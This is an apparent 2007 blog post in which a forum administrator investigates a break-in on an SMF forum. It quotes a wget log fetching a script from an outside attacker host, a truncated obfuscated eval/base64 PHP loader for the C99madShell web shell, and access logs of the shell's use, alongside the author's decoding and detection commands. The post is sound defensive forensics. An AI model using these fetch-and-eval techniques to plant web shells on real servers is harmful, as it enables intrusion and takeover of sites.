All Your SMF Forums Have Been Hacked. Have a Nice Day.

Posted: 2007-09-29 08:52:58

There is nothing quite like innocently checking over your httpd logs, attempting to figure out why the ‘preview’ feature of your forum s/w has stopped working [stuck on ‘fetching preview…’], only to come up to this…

--09:57:23-- http://kotzilla.jino-net.ru/include.txt => `include.txt' Resolving kotzilla.jino-net.ru... 217.107.217.29 Connecting to kotzilla.jino-net.ru|217.107.217.29|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 44,348 (43K) [text/plain] 0K .......... .......... .......... .......... ... 100% 69.60 KB/s 09:57:25 (69.60 KB/s) - `include.txt' saved [44348/44348]

For those that do not know, the above translates to using wget, or the equivalent, to download a script to your system. With all this being done via Apache and usually from a simple URL designed to exploit a weakness in the given application.

My journey starts here.

Step 1.

find / -name include.txt

Nothing. Intruder must have deleted or renamed it.

Step 2.

Check http://kotzilla.jino-net.ru/include.txt for clues.

<?PHP //Authentication $login = ""; //Login $pass = ""; //Pass $md5_pass = ""; //If no pass then hash eval(gzinflate(base64_decode('HJ3HkqN...[removed]...f/79z/8A'))); ?>

Intruder must think this is clever. Once you decode and inflate the string, it returns…

eval(gzinflate(base64_decode('[another string to decode and inflate]')));

Step 3.

We do not want to execute any PHP code that is an unknown. The only option left is to write a PHP script to decode/inflate until we get at the center…

<?php $string = "eval(gzinflate(base64_decode('HJ3HkqN...[removed]...f/79z/8A')));"; $pattern = '/^eval(gzinflate(base64_decode('([^');]*)/'; $count = 0; while (preg_match($pattern, $string, $matches) ) { $count++; $string = gzinflate(base64_decode($matches[1])); } echo "Decoded/Inflated:$countn"; echo "$string"; ?>

Seems to be some type of a web php shell script called C99madShell.

Step 4.

We need to locate the downloaded script…

find / -name '*.php' | xargs grep 'eval(gzinflate(base64_decode('

/.../forums.devside.net/Themes/readme.php:eval(gzinflate(base64_decode('HJ3Hkq...

Not good!

Step 5.

Check logs.

grep 'readme.php' /.../forums.devside.net/access_log

Intruder was up to something no good.

149.156.204.1 - - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)" 149.156.204.1 - - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.devside.net/Themes/readme.php" "Opera/9.21 (Windows NT 5.1; U; ru)" 149.156.204.1 - - [27/Sep/2007:13:08:03 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4366 "-" "GoogleBotv2" 149.156.204.1 - - [27/Sep/2007:13:09:24 -0400] "POST /Themes/readme.php HTTP/1.1" 200 4980 "http://forums.devside.net/Themes/readme.php" "GoogleBotv2" ...

Final Analysis.

I’ve search the logs, and I cannot locate anything helpful about the exploit. It does not seem to be an exploit in a URL, maybe POST related, or has something to do with the SMF theme function. I run no mods, and use the default theme, and do not allow users to switch themes.

The latest SMF 1.1.4 changelog does not state anything about fixed exploits.

I know the IP of the intruder [I’m sure just a hijacked system], the user_id on the forum, the mail account used for activation, but not much anything else.

resolveip 149.156.204.1 Host name of 149.156.204.1 is nzs.agh.edu.pl

149.156.204.1 - - [26/Sep/2007:09:52:58 -0400] "GET /index.php?action=activate;u=1992;code=136bd7eb0f HTTP/1.1" 200 3409 "http://www.qcsalabama.com/mail/src/ read_body.php?mailbox=INBOX&passed_id=685&startMessage=1" "Opera/9.21 (Windows NT 5.1; U; ru)"

Checking the forum account, I see this user has also logged in via another IP [and this might be where the exploit starts]…

83.219.135.75 - - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all& q=+%22powered+by+smf+1.1.3%22+site%3Anet&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" ... 83.219.135.75 - - [26/Sep/2007:09:57:07 -0400] "POST //index.php?action=login2 HTTP/1.1" 302 851 "-" "Mozilla/4.0 (compatible; Windows 5.1)" 83.219.135.75 - - [26/Sep/2007:09:57:09 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; Windows 5.1)" 83.219.135.75 - - [26/Sep/2007:09:57:11 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 1527 "-" "Mozilla/4.0 (compatible; Windows 5.1)" 83.219.135.75 - - [26/Sep/2007:09:57:23 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"

resolveip 83.219.135.75 Host name of 83.219.135.75 is ppp135-75.tis-dialog.ru

I can understand phpBB getting rooted, I can understand WordPress being owned, but this is a first one for SMF.

And for anyone having odd issues with SMF [like getting stuck on ‘fetching preview…’]…

Smile. All your SMF forums have been hacked. Have a nice day.

Search ‘fetching preview’ on the SMF support forums. This hack/exploit might be going back years.